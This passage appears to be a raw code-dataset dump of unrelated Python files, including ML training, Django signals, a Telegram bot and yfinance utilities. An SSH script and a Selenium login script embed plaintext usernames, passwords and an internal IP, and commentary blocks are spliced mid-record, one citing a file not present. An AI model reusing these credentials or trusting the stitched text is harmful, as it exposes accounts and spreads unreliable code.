backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus4(x):\n h = handle(x)\n increment(h)\n increment(h)\n increment(h)\n increment(h)\n return handle_get(h)\n\n assert plus4(3) == 7\n assert plus4(10) == 14\n\n\ndef test_increment_interleave():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus2(x, y):\n h1 = handle(x)\n h2 = handle(y)\n increment(h1)\n increment(h2)\n increment(h1)\n increment(h2)\n return handle_get(h1), handle_get(h2)\n\n assert plus2(3, 6) == (5, 8)\n assert plus2(10, -21) == (12, -19)\n\n\ndef test_increment_loop():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus(x, y):\n h = handle(x)\n i = y\n while i > 0:\n increment(h)\n i = i - 1\n return handle_get(h)\n\n assert plus(3, 4) == 7\n assert plus(10, 13) == 23\n\n\ndef test_increment_recursion():\n @myia(\n 
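# prepare_kb_embeddings.py above keeps only the entities that are actually
# linked and assigns each survivor a new dense index alongside its original
# KB row. The re-indexing step in miniature (Q-ids are made up):
entity2idx = {"Q1": 0, "Q2": 1, "Q42": 2, "Q7": 3}
needed = {"Q2", "Q42"}
kept = [(k, v) for k, v in entity2idx.items() if k in needed]
kept = [(k, v, i) for i, (k, v) in enumerate(kept)]
assert kept == [("Q2", 1, 0), ("Q42", 2, 1)]   # (entity, old row, new row)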
use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def length(h, xs):\n if not isinstance(xs, Empty):\n increment(h)\n length(h, xs.tail)\n return handle_get(h)\n\n h = HandleInstance(0)\n hb = length.to_device(h)\n assert length(hb, [1, 2, 3, 4]) == 4\n\n\ndef test_give_handle():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus(h, y):\n i = y\n while i > 0:\n increment(h)\n i = i - 1\n return handle_get(h)\n\n h1 = HandleInstance(0)\n h2 = HandleInstance(0)\n\n hb1 = plus.to_device(h1)\n hb2 = plus.to_device(h2)\n\n # handle is updated automatically\n assert plus(hb1, 4) == 4\n assert plus(hb2, 9) == 9\n assert plus(hb1, 30) == 34\n\n\ndef test_return_handle():\n @myia(\n use_universe=True,\n backend=\"relay\",\n backend_options={\"exec_kind\": \"debug\"},\n pipeline=upipeline,\n )\n def plus2(h):\n increment(h)\n increment(h)\n return h\n\n h = HandleInstance(0)\n hb = plus2.to_device(h)\n # This might return a BackendValue later but it seems\n # to return the handle for now.\n h2 = plus2(hb)\n assert h2.state == 2\n","sub_path":"tests/test_universal.py","file_name":"test_universal.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"531483802","text":"from __future__ import print_function\nfrom __future__ import division\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets,models,transforms\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport copy\nfrom torch.autograd import Variable\nfrom torchvision.models.resnet import ResNet\nfrom torchvision.models.resnet import BasicBlock\n\nprint(\"PyTorch Version: \",torch.__version__)\nprint(\"Torchvision Version\",torchvision.__version__)\n\ns_time = time.time()\ntorch.backends.cudnn.deterministic = True\n\ndata_dir = \"./fish3\"\n\n# Models to choose from [resnet, alexnet, vgg, squeezenet, densenet, inception]\nmodel_name = \"resnet\"\n\nnum_classes = 16\nbatch_size = 10\nnum_epochs = 30\n\nfeature_extract = True\n\ndef set_parameter_requires_grad(model,feature_extracting):\n if feature_extracting:\n for param in model.parameters():\n param.requires_grad = False\n\ndef initialize_model(model_name,num_class,feature_extract,use_pretrained=True):\n # Initialize these variables which will be set in this if statemment. 
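# Conceptually, the handle in these tests is a mutable cell threaded through
# otherwise pure code. A plain-Python stand-in for those semantics (this is
# NOT myia's implementation, only the behavior the assertions rely on):
class Cell:
    def __init__(self, state): self.state = state

def cell_get(h): return h.state
def cell_set(h, v): h.state = v

def bump(h): cell_set(h, cell_get(h) + 1)

h = Cell(3)
for _ in range(4):
    bump(h)
assert cell_get(h) == 7      # mirrors the plus4(3) == 7 assertion above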
Each of these variables is model specific\n    model_ft = None\n    input_size = 0\n\n    if model_name == \"resnet\":\n        # Use ResNet18 here\n        model_ft = models.resnet18(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft,feature_extract)\n        num_ftrs = model_ft.fc.in_features\n        model_ft.fc = nn.Linear(num_ftrs,num_classes)\n        input_size = 224\n    elif model_name == \"alexnet\":\n        model_ft = models.alexnet(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft,feature_extract)\n        num_ftrs = model_ft.classifier[6].in_features\n        model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\n        input_size = 224\n    elif model_name == \"vgg\":\n        # Use vgg11_bn\n        model_ft = models.vgg11_bn(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft,feature_extract)\n        num_ftrs = model_ft.classifier[6].in_features\n        model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)\n        input_size = 224\n    elif model_name == \"squeezenet\":\n        model_ft = models.squeezenet1_0(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft,feature_extract)\n        model_ft.classifier[1] = nn.Conv2d(512,num_classes,kernel_size=(1,1))\n        model_ft.num_classes = num_classes\n        input_size = 224\n    elif model_name == \"densenet\":\n        model_ft = models.densenet121(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft,feature_extract)\n        num_ftrs = model_ft.classifier.in_features\n        model_ft.classifier = nn.Linear(num_ftrs,num_classes)\n        input_size = 224\n    elif model_name == \"inception\":\n        # Inception v3. Expects (299,299) sized images and has auxiliary output\n        model_ft = models.inception_v3(pretrained=use_pretrained)\n        set_parameter_requires_grad(model_ft,feature_extract)\n        # Handle the auxiliary net\n        num_ftrs = model_ft.AuxLogits.fc.in_features\n        model_ft.AuxLogits.fc = nn.Linear(num_ftrs,num_classes)\n        # Handle the primary net\n        num_ftrs = model_ft.fc.in_features\n        model_ft.fc = nn.Linear(num_ftrs,num_classes)\n        input_size = 299\n    else:\n        print(\"Invalid model name, exiting...\")\n        exit()\n    return model_ft,input_size\n\ndef train_model(model,dataloaders,criterion,optimizer,num_epochs=25,is_inception=False):\n    since = time.time()\n    val_acc_history = []\n    best_model_wts = copy.deepcopy(model.state_dict())\n    best_acc = 0.0\n\n    for epoch in range(num_epochs):\n        print(\"Epoch {}/{}\".format(epoch+1,num_epochs))\n        print(\"-\" * 10)\n\n        # Each epoch has a training and validation phase\n        for phase in [\"train\",\"val\"]:\n            if phase == \"train\":\n                model.train()\n            else:\n                model.eval()\n            running_loss = 0.0\n            running_corrects = 0\n\n            # Iterate over data\n            s = 0\n            for inputs, labels in dataloaders[phase]:\n                s += 1\n                inputs = Variable(inputs)\n                labels = Variable(labels)\n                inputs = inputs.to(device)\n                labels = labels.to(device)\n\n                # zero the parameter gradients\n                optimizer.zero_grad()\n\n                # forward\n                # track history only if in train\n                with torch.set_grad_enabled(phase == \"train\"):\n                    # Get model outputs and calculate loss\n                    # Special case for inception because in training it has an auxiliary output.\n                    # In train mode we calculate the loss by summing the final output and the auxiliary output\n                    # but in testing we only consider the final output\n                    if is_inception and phase == \"train\":\n                        outputs,aux_outputs = model(inputs)\n                        loss1 = criterion(outputs,labels)\n                        loss2 = criterion(aux_outputs,labels)\n                        loss = loss1 + loss2\n                    else:\n                        outputs = model(inputs)\n                        loss = criterion(outputs,labels)\n                    _,preds = torch.max(outputs,1)\n\n                    # Show images\n                    if phase == \"val\" and epoch == num_epochs-1:\n                        filename = 
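# The pattern initialize_model applies to every backbone: freeze all
# pretrained weights, then swap in a fresh head whose parameters are trainable
# by default. A miniature version with a toy Sequential:
import torch.nn as nn

net = nn.Sequential(nn.Linear(8, 8), nn.ReLU(), nn.Linear(8, 4))
for p in net.parameters():
    p.requires_grad = False                # feature extraction: freeze all
net[2] = nn.Linear(8, 2)                   # new head, gradients enabled

trainable = [n for n, p in net.named_parameters() if p.requires_grad]
assert trainable == ["2.weight", "2.bias"]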
\"./fish_result2/figure_%s.jpg\"%s\n imshow(inputs,labels,preds,classes=image_datasets[\"val\"].classes,filename=filename)\n print(image_datasets[\"val\"].classes)\n\n # backward and optimize\n if phase == \"train\":\n loss.backward()\n optimizer.step()\n\n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n epoch_loss = running_loss / len(dataloaders[phase].dataset)\n epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n\n print(\"{} loss: {:.4f} Acc {:.4f}\".format(phase,epoch_loss,epoch_acc))\n\n # deep copy the model\n if phase == \"val\" and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n if phase == \"val\":\n val_acc_history.append(epoch_acc)\n time_elapsed = time.time() - since\n print(\"Training complete in {:.0f}m {:.0f}s\".format(time_elapsed // 60,time_elapsed % 60))\n print(\"Best val Acc: {:4f}\".format(best_acc))\n\n # Load best model weights\n model.load_state_dict(best_model_wts)\n return model,val_acc_history\n\ndef imshow(inputs,labels,preds,classes,filename):\n # Imshow for Tensor\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n images_so_far = 0\n num_images = 9\n fig = plt.figure(figsize=(10,10))\n for i in range(inputs.size()[0]):\n images_so_far += 1\n data = inputs[i].cpu().data\n data = data.numpy().transpose((1,2,0))\n inp = std * data + mean\n inp = np.clip(inp,0,1)\n title = \"Predicted:{} \\n Real: {}\".format(classes[preds[i]],classes[labels[i]])\n y = fig.add_subplot(3, 3, images_so_far)\n y.imshow(inp)\n plt.title(title,fontsize=8)\n plt.setp(y.get_xticklabels(), visible=False)\n plt.setp(y.get_yticklabels(), visible=False)\n plt.pause(0.001)\n plt.savefig(filename)\n if images_so_far == num_images:\n break\n# Inititalize the model for current run\nmodel_ft,input_size = initialize_model(model_name,num_classes,feature_extract,use_pretrained=True)\nprint(model_ft)\n\ndata_transforms = {\n \"train\":transforms.Compose([\n transforms.Resize((input_size,input_size)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])\n ]),\n \"val\":transforms.Compose([\n transforms.Resize((input_size,input_size)),\n transforms.ToTensor(),\n transforms.Normalize([0.485,0.456,0.406],[0.229,0.224,0.225])\n ])\n}\n\nprint(\"Initializing Datasets and Dataloaders...\")\n\n# Create training and validation datasets\nimage_datasets = {x:datasets.ImageFolder(os.path.join(data_dir,x), data_transforms[x]) for x in [\"train\",\"val\"]}\n# Create training and validation dataloaders\ndataloaders_dict = {x:torch.utils.data.DataLoader(image_datasets[x],batch_size=batch_size,shuffle=True,num_workers=0) for x in [\"train\",\"val\"]}\n# device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\ndevice = torch.device(\"cuda:0\")\n# Send model to GPU\nmodel_ft = model_ft.to(device)\n\n\"\"\" \n Gather the parameters to be optimized/updated in this run. If we do finetuning we will \n update all parameters of many layers that we want to change. However, if we do feature\n extracting, we will only update the parameters that we have just initialized, i.e. 
the \n parameters with requires_grad is True\n\"\"\"\nparams_to_update = model_ft.parameters()\nprint(\"Params to learn: \")\nif feature_extract:\n params_to_update = []\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n params_to_update.append(param)\n print(\"\\t\",name)\nelse:\n for name,param in model_ft.named_parameters():\n if param.requires_grad == True:\n print(\"\\t\",name)\n\n# Observe that all parameters are being optimized\noptimizer_ft = optim.Adam(params_to_update,lr=0.001)\n#optimizer_ft = optim.SGD(params_to_update,lr=0.001,momentum=0.9)\n\n# Set the loss function\ncriterion = nn.CrossEntropyLoss()\n\n# Train and evaluate\nmodel_ft,hist = train_model(model_ft,dataloaders_dict,criterion,optimizer_ft,\n num_epochs=num_epochs,is_inception=(model_name==\"inception\"))\n\nohist = [h.cpu().numpy() for h in hist]\nplt.figure()\nplt.plot(range(1,num_epochs+1),ohist,label=\"Pretrained\")\nplt.ylim((0,1.))\nplt.title(\"Accuracy\")\nplt.xlabel(\"Training Epochs\")\nplt.ylabel(\"Validation Accuracy\")\nplt.xticks(np.arange(1,num_epochs+1,1.0))\nplt.legend()\nplt.show()\nprint(time.time()-s_time)","sub_path":"fish_discrimination.py","file_name":"fish_discrimination.py","file_ext":"py","file_size_in_byte":10252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"152163150","text":"# -*- coding: utf-8 -*-\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom payments.models import Payments\nfrom account.models import Account, Rel_Acc_Cont\nfrom invoice.models import Invoice\nfrom decimal import *\n'''\nОбработчик баланса для клиента\n'''\n\n\n@receiver([post_save, post_delete], sender=Payments)\ndef recalculation_payments_for_account(sender, instance, **kwargs):\n account = instance.account_id\n account_id = instance.account_id_id\n total_payments_sum = Decimal(0)\n if account_id:\n payments_objects = Payments.objects.filter(account_id=account, status=\"Оплачено\")\n for payment in payments_objects.all():\n total_payments_sum = float(total_payments_sum) + float(payment.invoice_amount)\n account_edit = Account.objects.get(row_id=account_id)\n account_edit.payments_amount_total = total_payments_sum\n account_edit.total_balance = float(account_edit.payments_amount_total) - float(account_edit.invoices_amount_total)\n account_edit.save()\n\n\n@receiver([post_save, post_delete], sender=Invoice)\ndef recalculation_invoices_for_account(sender, instance, **kwargs):\n account = instance.account_name\n account_id = instance.account_name_id\n total_invoices_sum = Decimal(0)\n if account_id:\n invoices_objects = Invoice.objects.filter(account_name=account)\n for invoice in invoices_objects.all():\n total_invoices_sum = float(total_invoices_sum) + float(invoice.total)\n account_edit = Account.objects.get(row_id=account_id)\n account_edit.invoices_amount_total = total_invoices_sum\n account_edit.total_balance = float(account_edit.payments_amount_total) - float(account_edit.invoices_amount_total)\n account_edit.save()\n\n\n'''\nПри создании клиента добавляется создатель-работник\n'''\n","sub_path":"account/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"11062339","text":"#-*- coding: utf-8 -*-\nimport json\nimport paramiko\nimport sys\nfrom script.tools import logger\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\ndef 
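# A self-contained version of the "params to learn" gathering above: hand the
# optimizer only the parameters that still require gradients.
import torch.nn as nn
from torch import optim

net = nn.Linear(4, 2)
net.bias.requires_grad = False
params_to_update = [p for p in net.parameters() if p.requires_grad]
optimizer = optim.Adam(params_to_update, lr=0.001)
assert len(params_to_update) == 1        # only the weight remains trainable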
ssh2(grepInfo=None):\n con_dicts = {}\n data = []\n IP = \"10.10.252.155\"\n PORT = 6222\n USERNAME = \"xianping.wen\"\n PWD = \"qazWSX1995!\"\n TIME_OUT = 5\n try:\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(IP, port=PORT, username=USERNAME, password=PWD, timeout=TIME_OUT)\n if grepInfo is None:\n cmd = 'list |grep sh'\n else:\n cmd = 'list |grep sh|grep {}'.format(grepInfo)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n out = stdout.readlines()\n id = 1\n for o in out:\n con_list = []\n con_dict = {}\n for i in str(o).split(\" \"):\n if i is not \"\":\n con_list.append(i.strip(\"\\n\"))\n con_dict[\"id\"] = id\n con_dict[\"ip\"] = con_list[1]\n con_dict[\"name\"] = con_list[2]\n data.append(con_dict)\n id += 1\n con_dicts[\"data\"] = data\n logger.log(con_dicts)\n return json.dumps(con_dicts)\n except Exception as e:\n logger.log(e)\n finally:\n ssh.close()\n\n\nif __name__=='__main__':\n s = ssh2()\n print(s)","sub_path":"script/tools/get_log/get_log.py","file_name":"get_log.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"188906837","text":"from flask import session, flash\nfrom flask import g\nfrom flask_login import current_user\nfrom flask_wtf import FlaskForm\nfrom wtforms import PasswordField, StringField, SubmitField, BooleanField, SelectField, FieldList\n\nfrom data import db_session\nfrom data.cl_const import Const\nfrom data.db_class_courses import Courses\nfrom data.db_class_days import Days\nfrom data.db_class_groups import Groups\nfrom data.db_class_kabs import Kabs\n\n\nclass NewRasp(FlaskForm):\n idGroups = SelectField(u'Учебная группа:', coerce=int)\n idKabs = SelectField(u'Кабинет:', coerce=int)\n idDays = SelectField(u'День недели:', coerce=int)\n tstart = StringField(u'Начало:')\n tend = StringField(u'Окончание:')\n name = StringField(u'Наименование:')\n comment = StringField(u'Доп.информация:')\n bb_submit = SubmitField(u'Сохранить')\n bb_cancel = SubmitField(u'Отменить')\n\n def __init__(self, *args, **kwargs):\n super(NewRasp, self).__init__(*args, **kwargs)\n # try:\n # with db_session.create_session() as db_sess:\n # try:\n grps = g.db_sess.query(Groups).join(Courses).\\\n filter(Groups.idUsers == current_user.id, Courses.year == Const.YEAR).\\\n order_by(Groups.name)\n # except Exception as err:\n # grps = None\n # flash(f\"Ошибка обработки SQL\", category='error')\n self.idGroups.choices = [(rec.id, rec.name) for rec in grps]\n self.idGroups.data = kwargs.get('idGroups', 0)\n # Кабинет\n try:\n kabs = g.db_sess.query(Kabs).order_by(Kabs.id)\n except Exception as err:\n kabs = None\n flash(f\"Ошибка обработки SQL\", category='error')\n self.idKabs.choices = [(gg.id, u\"%s\" % f'{gg.name}') for gg in kabs]\n self.idKabs.data = kwargs.get('idKabs', 0)\n # День недели\n try:\n week_day = g.db_sess.query(Days).order_by(Days.id)\n except Exception as err:\n week_day = None\n flash(f\"Ошибка обработки SQL\", category='error')\n self.idDays.choices = [(gg.id, u\"%s\" % f'{gg.name}') for gg in week_day]\n self.idDays.data = kwargs.get('idDays', 0)\n # except Exception as err:\n # db_sess = None\n # flash(f\"Ошибка обработки SQL\", category='error')\n self.tstart.data = kwargs.get('tstart', '')\n self.tend.data = kwargs.get('tend', '')\n self.name.data = kwargs.get('name', 
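# The ssh2 helper in get_log.py above splits each remote output line on spaces
# and maps fixed columns to fields. That parsing works offline on canned
# output (the lines below are made up):
raw = ["run   10.10.0.5   job_a.sh\n", "run   10.10.0.6   job_b.sh\n"]
data = []
for idx, line in enumerate(raw, start=1):
    cols = [c.strip("\n") for c in line.split(" ") if c != ""]
    data.append({"id": idx, "ip": cols[1], "name": cols[2]})
assert data[0] == {"id": 1, "ip": "10.10.0.5", "name": "job_a.sh"}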
'')\n\n\n","sub_path":"forms/f_new_rasp.py","file_name":"f_new_rasp.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"568941459","text":"from selenium import webdriver\nimport time\n\ntry:\n browser = webdriver.Chrome()\n # 需要安装chrome driver, 和浏览器版本保持一致\n # http://chromedriver.storage.googleapis.com/index.html\n\n browser.get('https://shimo.im/welcome')\n time.sleep(1)\n\n # browser.switch_to.frame(browser.find_elements_by_tag_name('iframe')[0])\n # time.sleep(5)\n btm1 = browser.find_element_by_xpath('//*[@id=\"homepage-header\"]/nav/div[3]/a[2]')\n\n btm1.click()\n print(btm1)\n time.sleep(5)\n\n browser.find_element_by_xpath('//div[@class=\"input\"]/input[@type=\"text\"]').send_keys('15055495@qq.com')\n browser.find_element_by_xpath('//div[@class=\"input\"]/input[@name=\"password\"]').send_keys('test123test456')\n #li/a[@class=\"text-link\"]\n time.sleep(1)\n browser.find_element_by_xpath('//button[contains(@class,\"sm-button submi\")]').click()\n\n cookies = browser.get_cookies() # 获取cookies\n print(cookies)\n time.sleep(3)\n\nexcept Exception as e:\n print(e)\nfinally:\n browser.close()\n","sub_path":"week02/shimo_login.py","file_name":"shimo_login.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419690307","text":"\"\"\"Import TeleBot (PyTelegramBotApi).\"\"\"\nimport telebot\n\nimport functions as functions\nimport markups as m\n\n# main variables\n\nBOT = telebot.TeleBot(TOKEN)\n\n\nclass Task:\n \"\"\"Just a place for entred by user data.\"\"\"\n\n isInProcess = False\n # take \"i\" from loops\n book_code = 0\n subject_code = 0\n # fill during chatting\n subject = 'name'\n author = ''\n task = 0\n # advanced params\n form = 11\n depth = 1\n unit = 0\n lesson = 0\n isLong = True\n # create a list\n output = []\n messages = []\n\n def buildTask(self):\n \"\"\"Create list using entred by user data.\"\"\"\n self.output = []\n self.messages = []\n self.output.append(self.subject)\n self.output.append(self.author)\n self.output.append(self.unit)\n self.output.append(self.lesson)\n self.output.append(self.task)\n self.output.append(self.depth)\n self.output.append(self.isLong)\n self.output.append(self.form)\n self.output.append(self.messages)\n return self.output\n\n def resetTask(self):\n \"\"\"Reset task.\"\"\"\n self.isInProcess = False\n self.book_code = 0\n self.subject_code = 0\n self.subject = 'name'\n self.author = ''\n self.task = 0\n self.depth = 1\n self.unit = 0\n self.lesson = 0\n self.isLong = True\n self.form = 11 # JUST FOR Q VERSION\n self.output = []\n self.messages = []\n\n\nTASK = Task()\n\n\n@BOT.message_handler(commands=['start'])\ndef start_handler(message):\n \"\"\"Handler for /start.\"\"\"\n chat_id = message.chat.id\n TASK.resetTask()\n if not TASK.isInProcess:\n TASK.isInProcess = True\n msg = BOT.send_message(chat_id, 'Предмет?',\n reply_markup=m.subjects_markup)\n BOT.register_next_step_handler(msg, askSubject)\n\n\ndef askSubject(message):\n \"\"\"Ask subject.\"\"\"\n chat_id = message.chat.id\n subject = message.text\n subject_data = functions.check_subject(subject)\n if not subject_data[0]:\n msg = BOT.send_message(chat_id,\n 'Такого предмета нет, введи корректно.')\n BOT.register_next_step_handler(msg, askSubject)\n return\n TASK.subject_code = subject_data[2]\n TASK.subject = subject_data[1]\n TASK.author = subject_data[3]\n TASK.isLong = subject_data[4]\n 
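# NewRasp in f_new_rasp.py above fills SelectField choices from database
# queries at construction time. The same pattern without a database, using a
# plain wtforms Form so no Flask request context is needed (values made up):
from wtforms import Form, SelectField

class RaspSketch(Form):
    idGroups = SelectField("Group", coerce=int)

form = RaspSketch()
form.idGroups.choices = [(1, "A-101"), (2, "B-202")]   # stand-in query rows
assert form.idGroups.choices[0] == (1, "A-101")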
TASK.form = subject_data[5] # JUST FOR Q VERSION\n TASK.messages = subject_data[6]\n depth = functions.analyze_book(TASK.subject_code)\n TASK.depth = depth\n msg = BOT.send_message(chat_id, TASK.messages[0],\n reply_markup=m.none_markup)\n if depth == 3:\n BOT.register_next_step_handler(msg, askUnit)\n return\n elif depth == 2:\n BOT.register_next_step_handler(msg, askLesson)\n return\n elif depth == 1:\n BOT.register_next_step_handler(msg, askTask)\n return\n else:\n BOT.register_next_step_handler(msg, start_handler)\n return\n\n\ndef askUnit(message):\n \"\"\"Ask unit - first level filter. Most of subjects don't use it.\"\"\"\n chat_id = message.chat.id\n unit = message.text\n unit_data = functions.check_unit(TASK.subject_code, unit)\n if not unit_data[0]:\n msg = BOT.send_message(chat_id, 'Введите корректно.')\n BOT.register_next_step_handler(msg, askUnit)\n return\n TASK.unit = int(unit) - 1\n msg = BOT.send_message(chat_id, TASK.messages[1])\n BOT.register_next_step_handler(msg, askLesson)\n\n\ndef askLesson(message):\n \"\"\"Ask lesson - second level filter.\n\n Some subjects will use it like a 1st one.\n \"\"\"\n chat_id = message.chat.id\n lesson = message.text\n leson_data = functions.check_lesson(TASK.subject_code, TASK.unit, lesson)\n if not leson_data[0]:\n msg = BOT.send_message(chat_id, 'Введите корректно.')\n BOT.register_next_step_handler(msg, askLesson)\n return\n TASK.lesson = int(lesson) - 1\n msg = BOT.send_message(chat_id, TASK.messages[len(TASK.messages)-1])\n BOT.register_next_step_handler(msg, askTask)\n\n\ndef askTask(message):\n \"\"\"Ask task - last filter.\"\"\"\n chat_id = message.chat.id\n task = message.text\n task_data = functions.check_task(TASK.subject_code,\n TASK.unit, TASK.lesson, task)\n # STUB, NEED TASKS AMOUNT OF EVERY BOOK\n if not task_data[0]:\n msg = BOT.send_message(chat_id, 'Введите задание корректно.')\n BOT.register_next_step_handler(msg, askTask)\n return\n TASK.task = int(task) # TASK\n msg = BOT.send_message(chat_id, 'Сейчас найду!')\n output = TASK.buildTask()\n print(output)\n imgLinksList = functions.getImgLinks(output[0], output[1], output[2],\n output[3], output[4], output[5],\n output[6], output[7])\n for i in range(len(imgLinksList)):\n BOT.send_message(chat_id, imgLinksList[i])\n TASK.isInProcess = False\n msg = BOT.send_message(chat_id, 'Изи же!', reply_markup=m.start_markup)\n\n\n@BOT.message_handler(commands=['fast'])\ndef fast_handler(message):\n \"\"\"Handler for /fast.\"\"\"\n if not TASK.isInProcess:\n chat_id = message.chat.id\n msg_text = 'Эта функция в разработке! Она позволит писать запрос одним сообщение по типу \"алг 2 143\". Но я занят и не особо хочу допиливать этот колхоз.'\n BOT.send_message(chat_id, msg_text, reply_markup=m.start_markup)\n\n\nBOT.polling(none_stop=True)\n\n# Done by nybkox :)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"81223049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Yahoo! 
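# The bot above is a hand-rolled conversation state machine: each handler
# validates one field, stores it, and registers the next handler. The same
# control flow, modeled offline without the Telegram API:
def make_flow(steps):
    state, pending = {}, list(steps)
    def feed(value):                       # one incoming message
        if pending and pending[0][1](value):
            state[pending.pop(0)[0]] = value
        return state                       # invalid input re-asks (no pop)
    return feed

feed = make_flow([("subject", lambda v: v in {"math", "physics"}),
                  ("task", str.isdigit)])
feed("biology")                            # rejected, stays on "subject"
assert feed("math") == {"subject": "math"}
assert feed("42") == {"subject": "math", "task": "42"}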
Finance market data downloader (+fix for Pandas Datareader)\n# https://github.com/ranaroussi/yfinance\n#\n# Copyright 2017-2019 Ran Aroussi\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom __future__ import print_function\n\nimport requests as _requests_lib\nfrom requests.adapters import HTTPAdapter\nfrom requests.packages.urllib3.util.retry import Retry\n\nretry_code_list = [429, 500, 502, 503, 504]\nmax_retries=6\nbackoff_factor=0.075\ndef logging_hook(response, *args, **kwargs):\n # url, code, in_list = None, None, None\n # nonlocal url\n # nonlocal code\n # nonlocal in_list\n res = {}\n try:\n if response.status_code in retry_code_list:\n in_list = True\n print('>>>>>>>>>', 'requests')\n print(dir(response))\n print(vars(response))\n res['url'], res['code'] = response.url, response.status_code\n except AttributeError as e:\n if response.code in retry_code_list:\n in_list = True\n print('>>>>>>>>>', 'urllib')\n print(dir(response))\n print(vars(response))\n res['url'], res['code'] = response.url, response.code\n if 'url' in res or 'code' in res:\n print(f'retrying {res.get(\"url\")} [{res[\"code\"]}]')\n\nretry_strategy = Retry(\n total=max_retries,\n backoff_factor=backoff_factor,\n status_forcelist=retry_code_list,\n method_whitelist=[\"HEAD\", \"GET\", \"OPTIONS\"]\n)\nadapter = HTTPAdapter(max_retries=retry_strategy)\n_requests = _requests_lib.Session()\n_requests.mount(\"https://\", adapter)\n_requests.mount(\"http://\", adapter)\n\n_requests.hooks[\"response\"] = [logging_hook]\n\n#moved to bottom of file\n# _requests.get = retryException(exceptions=(Exception,))(_requests.get)\n\nfrom urllib.error import HTTPError\nimport time\nimport functools\nfrom requests.exceptions import ChunkedEncodingError\nfrom http.client import IncompleteRead, HTTPException\n\nimport re as _re\nimport pandas as _pd\nimport numpy as _np\nimport sys as _sys\nimport re as _re\n\ntry:\n import ujson as _json\nexcept ImportError:\n import json as _json\n\n\ndef empty_df(index=[]):\n empty = _pd.DataFrame(index=index, data={\n 'Open': _np.nan, 'High': _np.nan, 'Low': _np.nan,\n 'Close': _np.nan, 'Adj Close': _np.nan, 'Volume': _np.nan})\n empty.index.name = 'Date'\n return empty\n\n\ndef get_json(url, proxy=None):\n html = _requests.get(url=url, proxies=proxy).text\n\n if \"QuoteSummaryStore\" not in html:\n html = _requests.get(url=url, proxies=proxy).text\n if \"QuoteSummaryStore\" not in html:\n return {}\n\n json_str = html.split('root.App.main =')[1].split(\n '(this)')[0].split(';\\n}')[0].strip()\n data = _json.loads(json_str)[\n 'context']['dispatcher']['stores']['QuoteSummaryStore']\n\n # return data\n new_data = _json.dumps(data).replace('{}', 'null')\n new_data = _re.sub(\n r'\\{[\\'|\\\"]raw[\\'|\\\"]:(.*?),(.*?)\\}', r'\\1', new_data)\n\n return _json.loads(new_data)\n\n\ndef camel2title(o):\n return [_re.sub(\"([a-z])([A-Z])\", \"\\g<1> \\g<2>\", i).title() for i in o]\n\n\ndef auto_adjust(data):\n df = data.copy()\n ratio = df[\"Close\"] / df[\"Adj Close\"]\n df[\"Adj Open\"] = 
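# get_json above flattens Yahoo's {"raw": x, "fmt": "..."} objects down to the
# raw value with a regex, after replacing empty objects with null. A tiny
# reproduction of that substitution on a made-up payload:
import json, re

blob = '{"marketCap": {"raw": 1234, "fmt": "1.23k"}, "beta": {}}'
blob = blob.replace("{}", "null")
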